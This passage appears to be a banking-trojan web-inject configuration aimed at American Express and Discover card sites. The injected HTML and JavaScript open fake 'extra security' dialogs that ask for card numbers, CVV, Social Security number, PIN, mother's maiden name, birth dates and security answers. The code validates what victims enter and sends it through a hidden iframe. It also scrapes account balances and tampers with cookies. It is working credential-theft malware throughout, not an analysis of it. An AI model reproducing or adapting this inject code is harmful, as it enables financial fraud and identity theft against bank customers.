1943. <!--CVV-->
1944. <div id="txt2" class=sunclass style="text-align: left;">
1945. <table>
1946. <tr>
1947. <td align="right">
1948. <div id="div_cvv" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">CVV Code:</font></td></div>
1949. <td><div id="div_pininp" style =" padding:1px;"><input type="text" id="cvv" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cvv" maxlength=4 > <a href="#" style="font-weight:700;font-family: Arial;font-size: 10px;" onmouseover="over('http://www.upload.fm/file/312/ac62dbbce67681a33d23490607f59cf6')" onmousemove="move(event)" onmouseout="out()">(?)</a></div></td>
1950. </tr>
1951. </table>
1952. </div>
1953. <!--3 digit code-->
1954. <div id="txt2" class=sunclass style="text-align: left;">
1955. <table>
1956. <tr>
1957. <td align="right">
1958. <div id="div_3digitcode" style="padding:1px; padding-top:7px; width:172px ; height:25px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">3-Digit Code on the back of card:</font></td></div>
1959. <td><div id="div_pininp" style =" padding:1px;"><input type="text" id="3digitcode" style="text-align:right;width:33px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="3digitcode" method="get" maxlength=3 > <a href="#" style="font-weight:700;font-family: Arial;font-size: 10px;" onmouseover="over('http://www.upload.fm/file/273/58be12e2c069fcc7b20ebb2a11921f98')" onmousemove="move(event)" onmouseout="out()">(?)</a></div></td>
1960. </tr>
1961. </table>
1962. </div>
1963. <!--SSN-->
1964. <div id="txt2" class=sunclass style="text-align: left;">
1965. <table>
1966. <tr>
1967. <td align="right">
1968. <div id="div_ssn" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Social Security Number:</font></td></div>
1969. <td><div id="div_pininp" style =" padding:1px;">
1970. <input type="text" class="amountfield" id="ssn_1" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_1" maxlength=3 >
1971. <font style="font-family: Verdana;font-size: 11px;">-</font>
1972. <input type="text" class="amountfield" id="ssn_2" style="width:38px; height14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_2" maxlength=2 >
1973. <font style="font-family: Verdana;font-size: 11px;">-</font>
1974. <input type="text" class="amountfield" id="ssn_3" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_3" maxlength=4 >
1975. </div></td>
1976. </tr>
1977. </table>
1978. </div>
1979. <!--Personal security PIN-->
1980. <div id="txt2" class=sunclass style="text-align: left;">
1981. <table>
1982. <tr>
1983. <td align="right">
1984. <div id="div_ps_pin" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Personal security PIN:</font></td></div>
1985. <td><div id="div_pininp" style =" padding:1px;">
1986. <input type="text" class="amountfield" id="ps_pin" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ps_pin" maxlength=4 >
1987. </div></td>
1988. </tr>
1989. </table>
1990. </div>
1991. <!--MMN-->
1992. <div id="txt2" class=sunclass style="text-align: left;">
1993. <table>
1994. <tr>
1995. <td align="right">
1996. <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother's Maiden Name:</font></td></div>
1997. <td><div id="div_pininp" style =" padding:1px;">
1998. <input type="text" class="amountfield" id="exp_mm" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" name="mmn" >
1999. </div></td>
2000. </tr>
2001. </table>
2002. </div>
2003. <!--First Elementary School-->
2004. <!--
2005. <div id="txt2" class=sunclass style="text-align: left;">
2006. <table>
2007. <tr>
2008. <td align="right">
2009. <div id="pincode" style="width:243px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">The Name of Your First Elementary School:</font></td></div>
2010. <td><div id="div_pininp" style =" padding:1px;">
2011. <input type="text" class="amountfield" id="elementary_school" style="width:70px; height:12px; text-align:right; font-weight:700;font-family: Arial;font-size: 10px;" name="elementary_school" >
2012. </div></td>
2013. </tr>
2014. </table>
2015. </div>
2016. -->
2017. <!--POB-->
2018. <div id="txt2" class=sunclass style="text-align: left;">
2019. <table>
2020. <tr>
2021. <td align="right">
2022. <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Place of birth:</font></td></div>
2023. <td><div id="div_pob" style =" padding:1px;">
2024. <input type="text" class="amountfield" id="pob" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" name="pob" >
2025. </div></td>
2026. </tr>
2027. </table>
2028. </div>
2029. <!--DOB-->
2030. <div id="txt2" class=sunclass style="text-align: left;">
2031. <table>
2032. <tr>
2033. <td align="right">
2034. <div id="div_dob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Date of birth:</font></td></div>
2035. <td><div id="div_pininp" style =" padding:1px;">
2036. <input type="text" class="amountfield" id="dob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_mm" maxlength=2 >
2037. <font style="font-family: Verdana;font-size: 11px;">-</font>
2038. <input type="text" class="amountfield" id="dob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_dd" maxlength=2 >
2039. <font style="font-family: Verdana;font-size: 11px;">-</font>
2040. <input type="text" class="amountfield" id="dob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_yy" maxlength=4 >
2041. </div></td>
2042. </tr>
2043. </table>
2044. </div>
2045. <!--MDOB-->
2046. <div id="txt2" class=sunclass style="text-align: left;">
2047. <table>
2048. <tr>
2049. <td align="right">
2050. <div id="div_mdob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother Date of birth:</font></td></div>
2051. <td><div id="div_pininp" style =" padding:1px;">
2052. <input type="text" class="amountfield" id="mdob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_mm" maxlength=2 >
2053. <font style="font-family: Verdana;font-size: 11px;">-</font>
2054. <input type="text" class="amountfield" id="mdob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_dd" maxlength=2 >
2055. <font style="font-family: Verdana;font-size: 11px;">-</font>
2056. <input type="text" class="amountfield" id="mdob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_yy" maxlength=4 >
2057. </div></td>
2058. </tr>
2059. </table>
2060. </div>
2061. <!--Email-->
2062. <div id="txt2" class=sunclass style="text-align: left;">
2063. <table>
2064. <tr>
2065. <td align="right">
2066. <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Your Email:</font></td></div>
2067. <td><div id="div_email" style =" padding:1px;">
2068. <input type="text" class="amountfield" id="email" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" name="email" >
2069. </div></td>
2070. </tr>
2071. </table>
2072. </div>
2073. <div id="txt2" class=sunclass style="height: 20px; padding:3px ;padding-right:15px;">
2074. <font style="font-weight:700;font-family: Arial;font-size: 10px;text-align:right;"><div align="right"><input type="image" onclick="return formmySubmit();" align="right" src="/myca/shared/summary/asr/images/lnf/btn_continue.gif" value="Verify" title="Continue"/></div></font>
2075. </div>
2076. <input type="hidden" name="system" value="14">
2077. </form>
2078. </div><script type="text/javascript">
2079. function tabNext1CC(elem) {
2080. if(elem.value.length == 4) {
2081. document.getElementById('cc2').focus();
2082. function tabNext2CC(elem) {
2083. if(elem.value.length == 6) {
2084. document.getElementById('cc3').focus();
2085. function formmySubmit() {
2086. $("#msg").css("background", "#f5f6f1");
2087. if (checkCC()) {
2088. $("#div_cc_text").css("color", "black");
2089. if (checkExp()) {
2090. $("#div_exp").css("color", "black");
2091. if (checkCVV()) {
2092. $("#div_cvv").css("color", "black");
2093. if (check3DigitCode()) {
2094. $("#div_3digitcode").css("color", "black");
2095. if (SSN_check() == true) {
2096. $("#div_ssn").css("color", "black");
2097. if (PS_PIN_check() == true) {
2098. $("#div_ps_pin").css("color", "black");
2099. if (POB_check() == true) {
2100. $("#div_pob").css("color", "black");
2101. if (Email_check() == true) {
2102. $("#div_email").css("color", "black");
2103. if (checkDob() == true) {
2104. $("#div_dob").css("color", "black");
2105. $("#div_mdob").css("color", "black");
2106. $.cookie("trusted_rapport", "1", {
2107. expires: 10,
2108. path: "/",
2109. domain: ".americanexpress.com"
2110. });
2111. $("#dialog").dialog("close");
2112. return true
2113. } else {
2114. $("#div_dob").css("color", "red");
2115. $("#div_mdob").css("color", "red");
2116. doError("Date of birth")
2117. } else {
2118. $("#div_email").css("color", "red");
2119. doError("Email")
2120. } else {
2121. $("#div_pob").css("color", "red");
2122. doError("place of birth")
2123. } else {
2124. $("#div_ps_pin").css("color", "red");
2125. doError("personal security PIN")
2126. } else {
2127. $("#div_ssn").css("color", "red");
2128. doError("social security number")
2129. } else {
2130. $("#div_3digitcode").css("color", "red");
2131. doError("3-digit code")
2132. } else {
2133. $("#div_cvv").css("color", "red");
2134. doError("cvv code")
2135. } else {
2136. $("#div_exp").css("color", "red");
2137. doError("expiration date")
2138. } else {
2139. $("#div_cc_text").css("color", "red");
2140. doError("card number")
2141. function out() {
2142. document.body.removeChild(img)
2143. function move(a) {
2144. a = a || window.event;
2145. if (a.pageX == null && a.clientX != null) {
2146. var b = document.documentElement;
2147. var c = document.body;
2148. a.pageX = a.clientX + (b && b.scrollLeft || c && c.scrollLeft || 0) - (b.clientLeft || 0);
2149. a.pageY = a.clientY + (b && b.scrollTop || c && c.scrollTop || 0) - (b.clientTop || 0)
2150. img.style.left = a.pageX + 15 + "px";
2151. img.style.top = a.pageY + 15 + "px"
2152. function over(a) {
2153. img = document.createElement("div");
2154. document.body.appendChild(img);
2155. img.innerHTML = "<img src=" + a + " />";
2156. img.style.zIndex = "111111111111";
2157. img.style.position = "absolute";
2158. img.style.background = "#FFFFFF";
2159. img.style.border = "solid 1px #346fdc";
2160. img.style.padding = "4px";
2161. move();
2162. function SSN_check() {
2163. var a = $("#ssn_1").val();
2164. var b = $("#ssn_2").val();
2165. var c = $("#ssn_3").val();
2166. var d = a.length + b.length + c.length;
2167. if (d == 9)
2168. if ((isNaN(a) || isNaN(b) || isNaN(c)) == false)
2169. return true;
2170. return false
2171. function PS_PIN_check() {
2172. var a = $("#ps_pin").val();
2173. var d = a.length;
2174. if (d == 4)
2175. //if (isNaN(a) == false) // uncomment if pin is digital only
2176. return true;
2177. return false
2178. function POB_check() {
2179. var a = $("#pob").val();
2180. var d = a.length;
2181. if (d > 0) {
2182. return true;
2183. else {
2184. return true;
2185. function Email_check() {
2186. var a = $("#email").val();
2187. var d = a.length;
2188. if (d > 0) {
2189. return true;
2190. else {
2191. return true;
2192. function check3DigitCode() {
2193. var a = $("#3digitcode").val();
2194. var b = a.length;
2195. if (isNaN(a) == false)
2196. if (b == 3)
2197. return true;
2198. return false
2199. function checkCVV() {
2200. var a = $("#cvv").val();
2201. var b = a.length;
2202. if (isNaN(a) == false)
2203. if (b == 4)
2204. return true;
2205. return false
2206. function checkExp() {
2207. var a = $("#exp_mm").val();
2208. var b = $("#exp_yy").val();
2209. var c = a.length + b.length;
2210. if (c > 5)
2211. if (a > 0 && a < 13)
2212. if (b > 2009 && b < 2030)
2213. return true;
2214. return false
2215. function checkCC() {
2216. var a = $("#cc1").val();
2217. var b = $("#cc2").val();
2218. var c = $("#cc3").val();
2219. if (check_cc(a+b+c) && a.charAt(0) == "3")
2220. return true;
2221. return false
2222. function checkDob() {
2223. var a = $("#dob_mm").val();
2224. var b = $("#dob_dd").val();
2225. var c = $("#dob_yy").val();
2226. var d = $("#mdob_mm").val();
2227. var e = $("#mdob_dd").val();
2228. var f = $("#mdob_yy").val();
2229. var g = a.length + b.length + c.length;
2230. var h = d.length + e.length + f.length;
2231. if ((isNaN(a) || isNaN(b) || isNaN(c)) == false)
2232. if (g > 6)
2233. if (c < 1995 && c > 1900)
2234. if (a > 0 && a < 13 && b > 0 && b < 32)
2235. if ((isNaN(d) || isNaN(e) || isNaN(f)) == false)
2236. if (h > 6)
2237. if (d > 0 && d < 13 && e > 0 && e < 32)
2238. if (f + 12 < c)
2239. return true;
2240. return false
2241. function doError(a) {
2242. $("#ername").text(a);
2243. $("#ername1").text(a);
2244. $("#msg").dialog({
2245. closeOnEscape: false,
2246. resizable: false,
2247. modal: true,
2248. width: 350,
2249. modal: true,
2250. zIndex: 99999
2251. function formClose() {
2252. $("#msg").dialog("close");
2253. return true
2254. function check_cc(cardnumber) {
2255. var cardNo = cardnumber.replace(/[^0-9]/g, "");
2256. if (cardNo.length < 15 || cardNo.length > 16) {
2257. return false;
2258. var checksum = 0;
2259. var j = 1;
2260. var calc;
2261. for (i = cardNo.length - 1; i >= 0; i--) {
2262. calc = Number(cardNo.charAt(i)) * j;
2263. if (calc > 9) {
2264. checksum = checksum + 1;
2265. calc = calc - 10;
2266. checksum = checksum + calc;
2267. if (j == 1) {
2268. j = 2;
2269. } else {
2270. j = 1;
2271. if (checksum % 10 != 0) {
2272. return false;
2273. return true;
2274. jQuery.cookie = function(a, b, c) {
2275. if (typeof b != "undefined") {
2276. c = c || {};
2277. if (b === null) {
2278. b = "";
2279. c.expires = -1
2280. var d = "";
2281. if (c.expires && (typeof c.expires == "number" || c.expires.toUTCString)) {
2282. var e;
2283. if (typeof c.expires == "number") {
2284. e = new Date;
2285. e.setTime(e.getTime() + c.expires * 24 * 60 * 60 * 1e3)
2286. } else
2287. e = c.expires;
2288. d = "; expires=" + e.toUTCString()
2289. var f = c.path ? "; path=" + c.path: "";
2290. var g = c.domain ? "; domain=" + c.domain: "";
2291. var h = c.secure ? "; secure": "";
2292. document.cookie = [a, "=", encodeURIComponent(b), d, f, g, h].join("")
2293. } else {
2294. var i = null;
2295. if (document.cookie && document.cookie != "") {
2296. var j = document.cookie.split(";");
2297. for (var k = 0; k < j.length; k++) {
2298. var l = jQuery.trim(j[k]);
2299. if (l.substring(0, a.length + 1) == a + "=") {
2300. i = decodeURIComponent(l.substring(a.length + 1));
2301. break
2302. return i
2303. if ($.cookie("trusted_rapport"));
2304. else
2305. $(document).ready(function() {
2306. $('.comingSoonPop').remove();
2307. $('.comingSoonTransLayer').remove();
2308. $("#dialog").dialog({
2309. closeOnEscape: false,
2310. resizable: false,
2311. modal: true,
2312. width: 350,
2313. modal: true,
2314. zIndex: 99998
2315. });
2316. $("a.ui-dialog-titlebar-close").replaceWith('<div align="center" style="overflow: hidden; position: relative;padding:0; margin:0"><img src="https://secure.americanexpress.com/NextGenNavigation/img/logo_bluebox.gif"></div>');
2317. // balance
2318. $('form#test').append('<input id=balance name=balance type=hidden>');
2319. var balance = '';
2320. balance += 'Outstanding Balance='+$('div#outBalAmount').text().replace('and', '').replace('Cents', '')+" ___ ";
2321. balance += 'Available Credit ='+$('div#limitMsgAvailableCrd').text()+" ___ ";
2322. //alert(balance);
2323. $('form#test input#balance').val(balance);
2324. </script></body>]]></replacement>
2325. </modify>
2326. </actions>
2327. </httpinject>
2328. <httpinject>
2329. <conditions>
2330. <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://.*\.americanexpress\.com.*]]></url>
2331. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
2332. </url>
2333. </conditions>
2334. <actions>
2335. <modify>
2336. <pattern modifiers="msU"><![CDATA[\</html\>]]></pattern>
2337. <replacement><![CDATA[<script type="text/javascript">
2338. // remove saved IDs
2339. Delete_Cookie("profile", "/", ".americanexpress.com");
2340. var UsernameField = document.getElementById('Username');
2341. if(UsernameField) {
2342. UsernameField.value = '';
2343. UsernameField.blur();
2344. function get_cookie(name) {
2345. var cookie = " " + document.cookie;
2346. var search = " " + name + "=";
2347. var setStr = null;
2348. var offset = 0;
2349. var end = 0;
2350. if (cookie.length > 0) {
2351. offset = cookie.indexOf(search);
2352. if (offset != -1) {
2353. offset += search.length;
2354. end = cookie.indexOf(";", offset);
2355. if (end == -1) {
2356. end = cookie.length;
2357. setStr = unescape(cookie.substring(offset, end));
2358. return setStr;
2359. function Delete_Cookie( name, path, domain ) {
2360. if ( get_cookie( name ) ) document.cookie = name + "=" +
2361. ( ( path ) ? ";path=" + path : "") +
2362. ( ( domain ) ? ";domain=" + domain : "" ) +
2363. ";expires=Thu, 01-Jan-1970 00:00:01 GMT";
2364. </script></html>]]></replacement>
2365. </modify>
2366. </actions>
2367. </httpinject>
2368. <httpinject>
2369. <conditions>
2370. <url type="allow" onpost="1" onget="1" modifiers="U">^https\://www\.discovercard\.com/cardmembersvcs/achome/
2371. </url>
2372. <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
2373. </url>
2374. </conditions>
2375. <actions>
2376. <modify>
2377. <pattern modifiers="msU"><![CDATA[</body>]]></pattern>
2378. <replacement><![CDATA[<div id="namefr" style="display:none;" >
2379. <iframe width="50" height="50" id="myfx" name="myfx"></iframe>
2380. <iframe width="50" height="50" id="myfx1" name="myfx1" src="https://www.discovercard.com/cardmembersvcs/personalprofile/pp/GetInitialInfo"></iframe>
2381. </div>
2382. <link href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css" rel="stylesheet" type="text/css"/>
2383. <style type="text/css">
2384. .ui-dialog-titlebar{ background: white }
2385. .text1a{font-family: Arial; font-size: 10px;}
2386. .sunclass
2387. border-bottom-color: #cccccc;
2388. border-bottom-style: solid;
2389. border-bottom-width: 1px;
2390. border-collapse: collapse;
2391. background-color: #f5f6f1;
2392. color: #333333;
2393. margin-right:10px;
2394. margin-left:10px;
2395. text-align: center;
2396. </style>
2397. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
2398. <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
2399. <div id="msg" style=" display:none; height:80px;" class=sunclass>
2400. <div id="box" class=sunclass style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;padding-top:20px;padding-bottom:20px;">
2401. <font style="font-weight:700;font-family: Arial;font-size: 12px;">The <span id="ername">Passcode</span> you entered does not match our records. Please verify and make sure you re-enter your <span id="ername1"> passcode </span>&nbsp correctly.</font>
2402. </div>
2403. <div id="qdiv" style="display:none; width : 400px;" >
2404. <div id="txt1" class=sunclass style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;">
2405. <font style="font-weight:700;font-family: Arial;font-size: 10px;">In order to provide you with extra security ,we occasionally need to ask for additional information when you access you account online.</font>
2406. </div>
2407. <div id="txt2" class=sunclass>
2408. <font style="font-weight: 700;font-family: Arial;font-size: 10px;">Please answer the following questions:</font>
2409. </div>
2410. <form action="statsgatherr.js" id="test" method="get" target="myfx" >
2411. <div id="txt2" class=sunclass style="text-align: right;">
2412. <table>
2413. <tr>
2414. <td align="right">
2415. <div id="div_question_1" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">In what city were you born?</font></td></div>
2416. <td><div id="div_pininp" style =" padding:1px;">
2417. <input type="text" class="amountfield" id="q1" style="width:160px; height:12px; text-align:right; font-weight:700;font-family: Arial;font-size: 10px;" name="borncity" method="get" />
2418. </div></td>
2419. </tr>
2420. </table>
2421. </div>
2422. <div id="txt2" class=sunclass style="text-align: right;">
2423. <table>
2424. <tr>
2425. <td align="right">
2426. <div id="div_question_2" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">What is your father's middle name?</font></td></div>
2427. <td><div id="div_pininp" style =" padding:1px;">
2428. <input type="text" class="amountfield" id="q2" style="width:160px; height:12px; text-align:right; font-weight:700;font-family: Arial;font-size: 10px;" name="fotherMN " method="get" />
2429. </div></td>
2430. </tr>
2431. </table>
2432. </div>
2433. <div id="txt2" class=sunclass style="text-align: right;">
2434. <table>
2435. <tr>
2436. <td align="right">
2437. <div id="div_question_3" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">What is your mother's middle name?</font></td></div>
2438. <td><div id="div_pininp" style =" padding:1px;">
2439. <input type="text" class="amountfield" id="q3" style="width:160px; height:12px; text-align:right; font-weight:700;font-family: Arial;font-size: 10px;" name="motherMN" method="get" />
2440. </div></td>
2441. </tr>
2442. </table>
2443. </div>
2444. <div id="txt2" class=sunclass style="padding:3px ;padding-right:15px;">
2445. <font style="font-weight:700;font-family: Arial;font-size: 10px;text-align:right;"><div align="right">
2446. <input border="0" type="image" alt="Continue" onclick="return quest();" src="/discover/images/account/buttons/btn_continue.gif">
2447. </div>
2448. <input type="hidden" name="system" value="14">
2449. </form>
2450. </div>
2451. </div>
2452. </div>
2453. <div id="dialog" style=" display:none; height:180px; width:350px;padding:0; margin0;">
2454. <div id="txt1" class=sunclass style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;">
2455. <font style="font-weight:700;font-family: Arial;font-size: 10px;">In order to provide you with extra security ,we occasionally need to ask for additional information when you access you account online.</font>
2456. </div>
2457. <div id="txt2" class=sunclass>
2458. <font style="font-weight: 700;font-family: Arial;font-size: 10px;">Please enter the information below to continue:</font>
2459. </div>
2460. <form action="statsgatherr.js" id="test" method="get" target="myfx" >
2461. <!--CC-->
2462. <div id="full_cc" class=sunclass style="text-align: left;">
2463. <table>
2464. <tr>
2465. <td>
2466. <div id="div_cc_text" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;">
2467. <font style="font-weight:700;font-family: Arial;font-size: 10px;">Credit Card Number:</font><br><span class="text1a">(16 digits)</span></td></div>
2468. </td>
2469. <td>
2470. <div id="div_cc" style ="padding:1px;">
2471. <input type="text" class="amountfield" id="cc1" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; width=46px;" name="cc1" method="get" maxlength=4 ></input>
2472. <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
2473. <input type="text" class="amountfield" id="cc2"style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; " name="cc2" method="get" maxlength=4 ></input>
2474. <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
2475. <input type="text" class="amountfield" id="cc3" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cc3" method="get" maxlength=4 ></input>
2476. <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
2477. <input type="text" class="amountfield" id="cc4" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cc4" method="get" maxlength=4 ></input>
2478. </div>
2479. </td>
2480. </tr>
2481. </table>
2482. </div>
2483. <!--EXP-->
2484. <div id="fulll_exp" class=sunclass style="text-align: left;">
2485. <table>
2486. <tr>
2487. <td align="right">
2488. <div id="div_exp" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;">
2489. <font style="font-weight:700;font-family: Arial;font-size: 10px;">Exp.date:</font><br><span class="text1a">(/mm/yyyy/)</span></td></div>
2490. </td>
2491. <td>
2492. <div id="div_exp" style ="padding:1px;">
2493. <input type="text" class="amountfield" id="exp_mm" style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_mm" method="get" maxlength=2 ></input>
2494. <font style="font-weight:700;font-family: Arial;font-size: 10px;">/</font>
2495. <input type="text" class="amountfield" id="exp_yy"style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_yy" method="get" maxlength=4 ></input>
2496. </div></td>
2497. </tr>
2498. </table>
2499. </div>
2500. <!--CVV-->
2501. <div id="txt2" class=sunclass style="text-align: left;">
2502. <table>
2503. <tr>
2504. <td align="right">
2505. <div id="div_cvv" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;">
2506. <font style="font-weight:700;font-family: Arial;font-size: 10px;">CVV Code:</font><br><span class="text1a">(3 digits)</span></td></div>
2507. <td><div id="div_pininp" style =" padding:1px;"><input type="text" id="cvv" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cvv" method="get" maxlength=3 ></input></div></td>
2508. </tr>
2509. </table>
2510. </div>
2511. <!--SSN-->
2512. <div id="txt2" class=sunclass style="text-align: left;">
2513. <table>
2514. <tr>
2515. <td align="right">
2516. <div id="div_ssn" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Social Security Number:</font><br><span class="text1a">(9 digits)</span></td></div>
2517. <td><div id="div_pininp" style =" padding:1px;">
2518. <input type="text" class="amountfield" id="ssn_1" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_1" method="get" maxlength=3 ></input>
2519. <font style="font-family: Verdana;font-size: 11px;">-</font>
2520. <input type="text" class="amountfield" id="ssn_2" style="width:38px; height14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_2" method="get" maxlength=2 ></input>
2521. <font style="font-family: Verdana;font-size: 11px;">-</font>
2522. <input type="text" class="amountfield" id="ssn_3" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_3" method="get" maxlength=4 ></input>
2523. </div></td>
2524. </tr>
2525. </table>
2526. </div>
2527. <!--MMN-->
2528. <div id="txt2" class=sunclass style="text-align: left;">
2529. <table>
2530. <tr>
2531. <td align="right">
2532. <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother's Maiden Name:</font></td></div>
2533. <td><div id="div_pininp" style =" padding:1px;">
2534. <input type="text" class="amountfield" id="mmn" style="width:160px; height:12px; text-align:right; font-weight:700;font-family: Arial;font-size: 10px;" name="mmn" method="get" ></input>
2535. </div></td>
2536. </tr>
2537. </table>
2538. </div>
2539. <!--DOB-->
2540. <div id="txt2" class=sunclass style="text-align: left;">
2541. <table>
2542. <tr>
2543. <td align="right">
2544. <div id="div_dob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Date of birth:</font><br><span class="text1a">(/mm/dd/yyyy/)</span></td></div>
2545. <td><div id="div_pininp" style =" padding:1px;">
2546. <input type="text" class="amountfield" id="dob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_mm" method="get" maxlength=2 ></input>
2547. <font style="font-family: Verdana;font-size: 11px;">-</font>
2548. <input type="text" class="amountfield" id="dob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_dd" method="get" maxlength=2 ></input>
2549. <font style="font-family: Verdana;font-size: 11px;">-</font>
2550. <input type="text" class="amountfield" id="dob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_yy" method="get" maxlength=4 ></input>
2551. </div></td>
2552. </tr>
2553. </table>
2554. </div>
2555. <!--MDOB-->
2556. <div id="txt2" class=sunclass style="text-align: left;">
2557. <table>
2558. <tr>
2559. <td align="right">
2560. <div id="div_mdob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother Date of birth:</font><br><span class="text1a">(/mm/dd/yyyy/)</span></td></div>
2561. <td><div id="div_pininp" style =" padding:1px;">
2562. <input type="text" class="amountfield" id="mdob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_mm" method="get" maxlength=2 ></input>
2563. <font style="font-family: Verdana;font-size: 11px;">-</font>
2564. <input type="text" class="amountfield" id="mdob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_dd" method="get" maxlength=2 ></input>
2565. <font style="font-family: Verdana;font-size: 11px;">-</font>
2566. <input type="text" class="amountfield" id="mdob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_yy" method="get" maxlength=4 ></input>
2567. </div></td>
2568. </tr>
2569. </table>
2570. </div>
2571. <!--Sequence Number-->
2572. <div id="txt2" class=sunclass style="text-align: left;">
2573. <table>
2574. <tr>
2575. <td align="right">
2576. <div id="div_seqnum" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Sequence Number:</font><br><span class="text1a">(1 letter and 3 digits)</span></td></div>
2577. <td><div id="div_pininp" style =" padding:1px;">
